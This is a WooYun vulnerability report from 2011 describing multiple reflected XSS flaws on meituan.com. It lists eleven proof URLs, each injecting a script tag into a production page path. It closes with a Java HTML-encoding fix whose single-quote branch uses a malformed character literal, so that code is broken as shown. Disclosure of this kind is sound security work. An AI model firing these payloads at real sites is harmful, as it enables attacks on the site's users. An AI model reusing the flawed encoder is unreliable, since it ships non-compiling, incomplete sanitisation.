当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
美团网存在多个反射型XSS
相关厂商:
漏洞作者:
eke
提交时间:
2011-05-05 15:16
修复时间:
2011-05-06 10:51
公开时间:
2011-05-06 10:51
漏洞类型:
xss跨站脚本攻击
危害等级:
自评Rank:
5
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2011-05-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-05-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

美团网存在多个反射型的XSS漏洞,该漏洞是由于没有对用户输入进行验证导致的。攻击者利用该漏洞,可能盗取用户Cookie。

详细说明:

美团网以下页面存在反射型XSS:
http://www.meituan.com/
http://www.meituan.com/index/
http://www.meituan.com/index/?province=110000
http://www.meituan.com/about/
http://www.meituan.com/about/privacy/
http://www.meituan.com/feedback/
http://www.meituan.com/mobile/
http://www.meituan.com/merchants/
http://www.meituan.com/account/referrals/
http://www.meituan.com/account/signup/
http://www.meituan.com/help/api/

漏洞证明:

http://www.meituan.com///"></a><script>alert(/xss/)</script>



http://www.meituan.com/index//"></a><script>alert(/xss/)</script>



http://www.meituan.com/index/?province=110000"></a><script>alert(/xss/)</script>&city=bj



http://www.meituan.com/about//"></a><script>alert(/xss/)</script>



http://www.meituan.com/about/privacy/"></a><script>alert(/xss/)</script>



http://www.meituan.com/feedback//"></a><script>alert(/xss/)</script>



http://www.meituan.com/mobile//"></a><script>alert(/xss/)</script>



http://www.meituan.com/merchants//"></a><script>alert(/xss/)</script>



http://www.meituan.com/account/referrals/"></a><script>alert(/xss/)</script>



http://www.meituan.com/account/signup/"></a><script>alert(/xss/)</script>



http://www.meituan.com/help/api/"></a><script>alert(/xss/)</script>


修复方案:

在ASP/ASP.net中,可以使用:

Server.HTMLEncode(strHTML String)


在Java中,可以使用:

public static String HTMLEncode(String aTagFragment)
{
final StringBuffer result = new StringBuffer();
final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment);
char character = iterator.current();
while (character != StringCharacterIterator.DONE ){
if (character == '<') {
result.append("&lt;");
}
else if (character == '>') {
result.append("&gt;");
}
else if (character == '\"') {
result.append("&quot;");
}
else if (character == '\") {
result.append("&#039;");
}
else if (character == '\\') {
result.append("&#092;");
}
else if (character == '&') {
result.append("&amp;");
}
else {
// 如果字符不是特殊字符,则直接添加到结果中
result.append(character);
}
character = iterator.next();
}
return result.toString();
}

版权声明:转载请注明来源 eke@乌云


>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:3 (WooYun评价)